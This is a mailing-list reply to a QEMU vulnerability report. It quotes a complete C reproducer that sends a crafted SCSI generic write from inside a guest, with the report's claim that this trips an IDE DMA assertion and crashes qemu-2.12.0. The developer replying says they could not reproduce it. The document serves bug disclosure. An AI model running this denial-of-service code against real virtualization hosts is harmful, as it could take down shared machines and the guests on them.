On 06/17/2018 08:13 AM, air icy wrote:
>
> Hi,
> QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version
> qemu-2.12.0
> run the program in qemu-2.12.0:
>
> #define _GNU_SOURCE
> #include <endian.h>
> #include <sys/syscall.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <string.h>
> #include <sys/stat.h>
> #include <stdint.h>
> #include <string.h>
> static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
> {
> if (a0 == 0xc || a0 == 0xb) {
> char buf[128];
> sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block",
> (uint8_t)a1, (uint8_t)a2);
> return open(buf, O_RDWR, 0);
> } else {
> char buf[1024];
> char* hash;
> strncpy(buf, (char*)a0, sizeof(buf) - 1);
> buf[sizeof(buf) - 1] = 0;
> while ((hash = strchr(buf, '#'))) {
> *hash = '0' + (char)(a1 % 10);
> a1 /= 10;
> }
> return open(buf, a2, 0);
> }
> }
> uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
> void loop()
> {
> long res = 0;
> memcpy((void*)0x20000000, "/dev/sg#", 9);
> res = syz_open_dev(0x20000000, 0, 2);
> if (res != -1)
> r[0] = res;
> res = syscall(__NR_dup2, r[0], r[0]);
> if (res != -1)
> r[1] = res;
> *(uint8_t*)0x20000ec0 = 0;
> *(uint8_t*)0x20000ec1 = 0;
> *(uint8_t*)0x20000ec2 = 0;
> *(uint8_t*)0x20000ec3 = 0;
> *(uint32_t*)0x20000ec8 = 0;
> *(uint8_t*)0x20000ed8 = 0;
> *(uint8_t*)0x20000ed9 = 0;
> *(uint8_t*)0x20000eda = 0;
> *(uint8_t*)0x20000edb = 0;
> memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3",
> 12);
> syscall(__NR_write, r[1], 0x20000ec0, 0x323);
> }
> int main()
> {
> syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
> loop();
> return 0;
> }
>
> this will crash qemu, output information:
> qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 ==
> s->sg.size' failed.
> Thanks
> owl337
>
>
Hi, I haven't had any luck reproducing this using this strategy. You've
provided several different versions of a reproducer, which one is the
correct one to be using?
